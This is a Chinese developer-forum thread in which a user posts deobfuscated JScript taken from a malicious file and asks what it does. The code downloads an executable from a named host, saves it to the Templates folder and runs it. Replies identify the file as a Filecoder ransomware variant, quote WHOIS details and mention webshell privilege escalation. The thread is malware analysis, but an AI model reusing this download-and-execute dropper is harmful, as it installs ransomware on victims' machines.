推荐关注 Meteor JSLint - a Javascript code quality tool jsFiddle D3.js WebStorm 推荐书目 Javascript 权威指南第 5 版
Closure: The Definitive Guide
Closure: The Definitive Guide 
这是一个创建于 3073 天前的主题,其中的信息可能已经有所发展或是发生改变。
原文件是一长串乱码,原作者往里面故意添加了许多无意义字符串,删掉那些无意义字符串之后,最终有意义的代码如下:
var wsh = new ActiveXObject("wscript.shell"); var sh = new ActiveXObject("shell.application"); var HTTP = new ActiveXObject("MSXML2.XMLHTTP"); var Stream = new ActiveXObject("ADODB.Stream"); var path = wsh.SpecialFolders("Templates")+"\\"+((Math.random()*999999)+9999|0)+".exe"; HTTP.Open("GET", "http://mopooland.top/404", false); HTTP.Send(); if (HTTP.Status == 200) { Stream.Open(); Stream.Type = 1; Stream.Write(HTTP.ResponseBody); Stream.Position = 0; Stream.SaveToFile(path, 2); Stream.Close(); sh.ShellExecute(path, "", "", "open", 1); } http://mopooland.top/404打开里面什么都没有,求懂 js 的大神帮忙解释一下这个代码是要干嘛?是跟最近卷土重来的比特币病毒有关么?
 | 1 liangch 2017-05-13 14:36:22 +08:00  1 http://mopooland.top/404 一个可执行的文件 |
 | 2 lbb9432 2017-05-13 14:51:01 +08:00 楼上文件 ESET 说是 Win32/Filecoder.FV 特洛伊木马 的变种 勒索吧 https://www.virustotal.com/ja/file/a088b87b99804891248d2820fd6f39f8ef1878df568889a59a4a0aa2a8e3310d/analysis/1494658008/ |
 | 3 Pastsong 2017-05-13 14:51:20 +08:00 Name:Robert Ruthven Organization:Gamblin Artists Colors Street:323 SE Division Pl City:Portland State:OR Postal Code:97202 Country:US Phone:+1.5034359411 Fax:+1.5034359411 Email:[email protected] Whois 都是假信息 |
| 4 Pastsong 2017-05-13 14:52:15 +08:00 Email: [email protected] |
 | 5 aristotll 2017-05-13 17:29:49 +08:00 估计用的 是 IE 那一套下载东西 |
 | 7 crazyskyangel 2017-05-13 21:22:07 +08:00 WScript 中的 JScript 脚本,就是利用 Windows 脚本系统做的病毒下载执行器。 只要杀毒软件的主动防御好点就能防住,如果是免杀,用户懂点规则也启动不了。 |
 | 8 Mayter 2017-05-14 12:24:22 +08:00 别的我不太清楚,但是拿到 webshell(asp,或者 aspx,asp 居多)提权的时候需要看 wscript.shell shell.application 这两个组件才可以执行系统命令,进而可以执行提权文件进行提权。 |
Select Language